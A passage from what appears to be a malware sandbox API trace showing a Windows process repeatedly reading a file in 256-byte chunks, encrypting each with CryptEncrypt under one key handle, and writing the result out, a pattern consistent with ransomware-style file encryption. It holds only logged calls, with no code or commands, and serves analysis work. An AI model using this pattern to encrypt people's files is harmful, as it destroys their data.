pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.483] GetLastError () returned 0x0 [0148.483] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.483] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.483] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.483] GetLastError () returned 0x0 [0148.483] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.483] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.483] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.483] GetLastError () returned 0x0 [0148.484] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.484] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.484] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.484] GetLastError () returned 0x0 [0148.484] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.484] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.484] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.484] GetLastError () returned 0x0 [0148.484] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.484] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.484] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.484] GetLastError () returned 0x0 [0148.484] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.484] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.484] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.484] GetLastError () returned 0x0 [0148.484] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.484] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.484] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.484] GetLastError () returned 0x0 [0148.484] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.484] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.485] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.485] GetLastError () returned 0x0 [0148.485] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.485] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.485] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.485] GetLastError () returned 0x0 [0148.485] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.485] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.485] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.485] GetLastError () returned 0x0 [0148.485] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.485] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.485] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.485] GetLastError () returned 0x0 [0148.485] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.485] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.485] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.485] GetLastError () returned 0x0 [0148.485] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.485] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.485] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.485] GetLastError () returned 0x0 [0148.485] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.485] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.485] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.485] GetLastError () returned 0x0 [0148.485] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.486] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.486] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.486] GetLastError () returned 0x0 [0148.486] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.486] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.486] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.486] GetLastError () returned 0x0 [0148.486] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.486] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.486] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.486] GetLastError () returned 0x0 [0148.486] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.486] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.486] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.486] GetLastError () returned 0x0 [0148.486] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.486] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.486] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.486] GetLastError () returned 0x0 [0148.486] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.486] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.486] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.486] GetLastError () returned 0x0 [0148.486] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.487] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.487] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.487] GetLastError () returned 0x0 [0148.487] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.487] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.487] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.487] GetLastError () returned 0x0 [0148.487] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.487] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.487] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.487] GetLastError () returned 0x0 [0148.487] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.487] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.487] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.487] GetLastError () returned 0x0 [0148.487] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.487] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.487] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.487] GetLastError () returned 0x0 [0148.487] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.487] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.487] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.487] GetLastError () returned 0x0 [0148.487] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.487] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.488] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.488] GetLastError () returned 0x0 [0148.488] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.488] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.488] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.488] GetLastError () returned 0x0 [0148.488] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.488] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.488] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.488] GetLastError () returned 0x0 [0148.488] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.488] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.488] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.488] GetLastError () returned 0x0 [0148.488] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.488] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.488] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.488] GetLastError () returned 0x0 [0148.488] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.488] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.488] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.488] GetLastError () returned 0x0 [0148.488] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, 